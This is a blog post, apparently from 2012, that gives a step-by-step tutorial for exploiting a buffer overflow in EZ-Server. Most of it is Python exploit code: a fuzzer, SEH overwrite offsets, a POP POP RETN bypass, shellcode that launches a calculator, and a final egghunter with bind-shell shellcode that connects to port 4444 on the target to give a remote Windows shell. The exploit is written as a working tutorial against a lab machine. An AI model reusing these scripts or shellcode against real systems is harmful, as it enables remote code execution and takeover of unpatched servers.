Comments

Pages

Thursday, 4 October 2012

Buffer Overflow EZ-Server

Posted by at 06:36 Read our previous post
First install Run EZ-Server and open your browser locate at IP of Machine where EZ-Server running.
In this case my IP is 192.168.56.102 and using port 8000. We will see login form of EZ-Server.
Start from here, we can predicting what commands send into ez-server. I'm using wireshark to capture it.
We got the send packet look like this :
"GET /blablabla....."
head2 = "\r\n\r\n"+"HTTP/1.1"

And I will setup fuzzer into blablabla.


#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x41" * 10000
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()


Run our fuzzer and look at the EZ-Server, it crash.
Now open we need to create pattern using metasploit with size 10000 byte.
/pentest/exploits/framework/tools/pattern_create.rb 10000
Back into fuzzer and edit look like this
#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa......."
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

Open your EZ-Server and attach into Ollydbg, and run your fuzzer again. EZ-Server crash, back into Ollydbg and then click View->SEH Cain, select SEH Cain and press Shift+F9. It will by pass SEH and EIP will overwrite, now note / remember the EIP value.
Check where the byte was overwriten the EIP with metasploit tool.
Offset 48316F48 > 5883
/pentest/exploits/framework/tools/pattern_offset.rb 48316F48
5883

Now, back into fuzzer and edit look like this:

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x90" * 5879 #5883 - 4 byte for CCCC
buffer += "\xcc\xcc\xcc\xcc"
buffer += "\x41\x41\x41\x41"
buffer += "\x90" * (10000-len(buffer))
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

Restart Ez-server and reopen then attach into Ollydbg. Run your fuzzer, back into ollydbg make sure EIP was overwritten with 41414141.
If EIP was overwriten, now time for check module for bypass SEH protector. View->Exectuble Module. For short tutorial, I will select MSVCRTD.dll
Select and search POP POP RETN. In the register block, right click and select search for->sequence of command->POP r32 POP r32 RETN
If you found this command, means that the module is right for bypass SEH

copy thie module and check using msfpescan
msfpescan -i MSVCRTD.dll | grep DllCharacteristics
DllCharacteristics 0x0000000
0x0000000 means that this module not protected by SEH. Note the register of module to bypass SEH.
And edit fuzzer look like this

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x90" * 5879
buffer += "\xeb\x06\x90\x90"
buffer += "\x96\x96\x20\x10" #10209696   5B               POP EBX alamat bypass SEH
buffer += "\x90" * (10000-len(buffer))
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()
Restart EZ-Server and attach into Ollydbg then run the fuzzer.
Check the value of SEH Cain. View->Seh cain. is right overwrite into MSVCRTD.dll module? if yes the fuzzer is correct.
Now, insert payload into fuzzer with short payload example Execute Command.

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x90" * 5879
buffer += "\xeb\x06\x90\x90"
buffer += "\x96\x96\x20\x10" #10209696   5B               POP EBX
buffer += ("\x31\xc9\xd9\xce\xbb\x4c\xd3\x23\xc3\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x5f\x11\x03\x13\xc2\xc1\x36\x57\x0c\x41\xb9\xa7"
"\xcd\xc1\xfc\x9b\x46\xa9\xfb\x9b\x59\xbd\x8f\x14\x42\xca\xcf\x8a"
"\x73\x27\xa6\x41\x47\x3c\x38\xbb\x99\x82\xa2\xef\x5e\xc2\xa1\xe8"
"\x9f\x09\x44\xf7\xdd\x65\xa3\xcc\xb5\x5d\x48\x47\xd3\x15\x0f\x83"
"\x1a\xc1\xd6\x40\x10\x5e\x9c\x09\x35\x61\x49\x3e\x59\xea\x8c\xab"
"\xeb\xb0\xaa\x2f\x2f\x79\x73\x4b\x24\x3a\x43\x16\xfa\xc3\xaf\x93"
"\xbb\x3f\x3b\xd3\x27\xed\xb0\x7b\x50\x06\xcf\xf0\xe0\x68\xd0\x06"
"\xe1\x03\xb9\x3a\xbe\x22\xcc\x22\x16\xcc\xc8\x21\x56\xb5\x78\x4d"
"\x29\x92\x9b\xfe\xbd\xba\xa2\x8a\x30\xec\xa5\x6d\x2f\x73\x36\x12"
"\xb0")
buffer += "\x90" * (10000-len(buffer))
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

IF calculator appear, it means that the payload was successfully executed. In this step we was successfully to embed payload into fuzzer. Next We will embed payload for bind shell.
Restart EZserver and edit your fuzer look like this :

#!/usr/bin/python
import socket
import os
import time
import sys

tip = "192.168.56.102"
tport = 8000

head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
hunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
shellcode = ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
"\x31\x42\x12\x03\x42\x12\x83\xf7\x8b\x14\xd9\xfb\x1e\x32\x6f\xeb"
"\x26\x3b\x8f\x14\xb8\x4f\x1c\xce\x1d\xdb\x98\x32\xd5\xa7\x27\x32"
"\xe8\xb8\xa3\x8d\xf2\xcd\xeb\x31\x02\x39\x5a\xba\x30\x36\x5c\x52"
"\x09\x88\xc6\x06\xee\xc8\x8d\x51\x2e\x02\x60\x5c\x72\x78\x8f\x65"
"\x26\x5b\x58\xec\x23\x28\xc7\x2a\xad\xc4\x9e\xb9\xa1\x51\xd4\xe2"
"\xa5\x64\x01\x1f\xfa\xed\x5c\x73\x26\xee\x3f\x48\x17\xd5\xa4\xc5"
"\x1b\xd9\xaf\x99\x97\x92\xc0\x05\x05\x2f\x60\x3d\x0b\x58\xef\x73"
"\xbd\x74\xbf\x74\x17\xe2\x13\xec\xf0\xd8\xa1\x98\x77\x6c\xf4\x07"
"\x2c\x6d\x28\xdf\x07\x7c\x35\x24\xc8\x80\x10\x05\x61\x9b\xfb\x38"
"\x9c\x6c\x06\x6f\x35\x6f\xf9\x5f\xa1\xb6\x0c\xaa\x9f\x1e\xf0\x82"
"\xb3\xf3\x5d\x79\x67\xb7\x32\x3e\xd4\xc8\x65\xa6\xb2\x27\xda\x40"
"\x10\xc1\x03\x19\xfe\x75\xd9\x51\x38\x22\x21\x47\xac\xdd\x8c\x32"
"\xce\x0e\x46\x18\x9d\x81\x7e\x37\x21\x0b\xd3\xe2\x22\x64\xbc\xe9"
"\x94\x03\x74\xa6\xd9\xda\xd7\x1c\x72\xb6\x28\x4c\xe9\x50\x30\x15"
"\xc8\xd8\xe9\x1a\x02\x4f\xe9\x34\xcd\x1a\x71\xd2\x7a\xb8\x14\x93"
"\x9e\x54\xb7\xfa\x49\x65\xbe\x1b\xe3\x31\x48\x01\xc5\x79\xb9\x6f"
"\xd8\x38\x13\x91\x67\x91\xf8\xe0\x12\xd1\x55\x51\x49\x49\xd8\x5b"
"\x3d\x9c\xe3\xd6\x06\x5e\xcd\x43\xd0\xf2\xa3\x22\x8f\x98\x42\x95"
"\x7e\x08\x14\xea\x51\xda\x3b\xcd\x57\xd5\x17\x12\x81\x83\x68\x13"
"\x19\xab\x47\x60\x31\xaf\xeb\xb2\xda\xb0\x3a\x68\xdc\x9f\xab\xf2"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") # size 344 byte
buffer = "\x90" * 5495 #5678 #5879 # offset 5883, karena masuk buffer JUMP SHORT maka dikurangi 4 byte
buffer += "w00tw00t"
buffer += shellcode
buffer += "\x90" * 32 #nops
buffer += "\xeb\x06\x90\x90"
buffer += "\x96\x96\x20\x10" # 10209696 alamat SEH ter-overwrite
buffer += hunter
buffer += "\x90" * (10004-len(buffer))
sploit = head1 + buffer + head2
print "[+] Connectiong to %s on port %d" % (tip,tport)
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((tip,tport))
print("[+] Sending PAYLOAD")
sock.send(sploit)
sock.close()
print("[+] Exploit send successfully")
print "[+] Waiting for 5 sec before spawning shell to " + tip + ":4444\r"
print "\r"
time.sleep(5)
os.system("telnet " + tip + " 4444")
print "[-] Connection lost from " + tip + ":4444 \r\n"
except:
print "[-] Could not connect to " + tip + ":4444\r\n"
sys.exit(0)
Run the fuzzer and look, we got the windows shell.
I'm sorry for not include screenshot for this post, because my internet connection is slow.


No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template